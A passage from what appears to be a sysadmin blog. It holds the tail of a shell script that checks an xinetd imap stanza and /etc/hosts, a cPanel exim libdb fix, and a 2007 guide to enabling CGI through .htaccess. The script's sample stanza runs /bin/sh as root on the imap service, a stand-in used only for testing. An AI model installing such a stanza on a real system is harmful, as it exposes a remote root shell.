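    elif [ ! -x "$srv" ]; then
        echo "FAIL server $srv is missing or not executable"; n=$((n + 1))
    fi
    [ "$n" -eq 0 ] && echo "OK imap stanza in $1 is enabled, server is $srv"
    return $n
}

# Step 5: /etc/hosts must map 127.0.0.1 to the plain name "localhost"
# (localhost.localdomain alone does not count).
hosts_has_localhost() {
    grep -Eq '^[ \t]*127\.0\.0\.1([ \t]+[^ \t]+)*[ \t]+localhost([ \t]|$)' "$1"
}

# Constructed samples: the stanza from step 3 with /bin/sh standing in for
# /usr/sbin/imapd, a broken stanza, and a hosts file.
GOOD=$(mktemp); BAD=$(mktemp); HOSTS=$(mktemp)
trap 'rm -f "$GOOD" "$BAD" "$HOSTS"' EXIT
cat > "$GOOD" <<'EOF'
# default: on
# description: imapd
service imap
{
    disable = no
    socket_type = stream
    wait = no
    user = root
    server = /bin/sh
    log_on_success += DURATION USERID
    log_on_failure += USERID
    nice = 10
}
EOF
cat > "$BAD" <<'EOF'
service imap
{
    disable = yes
    server = /nonexistent/imapd
}
EOF
printf '127.0.0.1 localhost.localdomain localhost\n' > "$HOSTS"

imap_xinetd_check "$GOOD"
imap_xinetd_check "$BAD" || echo "$? finding(s) in the broken sample"
hosts_has_localhost "$HOSTS" && echo "OK localhost entry present"
```

On a RedHat-style box run imap_xinetd_check /etc/xinetd.d/imap and hosts_has_localhost /etc/hosts before reaching for telnet; if both pass and telnet localhost 143 still fails, the remaining suspects are xinetd itself (step 2) and the firewall (step 6).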

Issue with the libdb libraries and trouble with email

When having trouble with email and the following error in the exim_paniclog on a cpanel server:

User 0 set for local_delivery transport is on the never_users list

The issue appears to be with some of the libraries; the following commands should fix it:

# ln -s libdb2.so.3 libdb.so.3

# /scripts/eximup --force

# /etc/rc.d/init.d/exim stop
# /etc/rc.d/init.d/exim start

Friday, September 21, 2007

Running your own CGI scripts

Issue: To enable a directory and its subdirectories for CGI, create a .htaccess file there with the following lines:

Options ExecCGI

AddType application/x-httpd-cgi .cgi .pl


These contents may be combined with other configuration features such as restricted access to a part of your Web site. If the system administrator really do not want you to run CGI scripts she or he can disable the use of .htaccess files for all users. .htaccess file must be set to be readable by everybody.

You can change the ownerhsip and permissions for the .htaccess file as follows:

# chmod 644 .htaccess

# chown user:user .htaccess


1) Place your script in the same folder as the .htaccess file.

2) Make sure that the script has the extension .cgi or .pl. The latter is commonly used for programs written in Perl, a popular language for writing CGI scripts.

In case you wrote your script in C or C++ you must compile it with a compiler for the particular operating system. For example, a program compiled on Windows will not run directly on Unix or Linux; you have to compile the source code with a compiler for Unix, Linux, or the other operating system accordingly.

After the program is transferred to the Web server it needs to be marked as executable. Typically files are read-write only by default and cannot be run as programs.

You can do it by typing the following command in a console window:

# chmod a+rx program.pl (where program.pl is the name of your program)

You can test a sample script in Perl and look at its source code. If you want to copy the script to your Web site you need to modify the very first line so that it points to the location of Perl on your Web server.

There are some security issues in case your program needs to write to a file: you need to grant other users (such as the Web server daemon) permission to modify that file or the files in your directory. Use the chmod command to enable the proper access to only those files.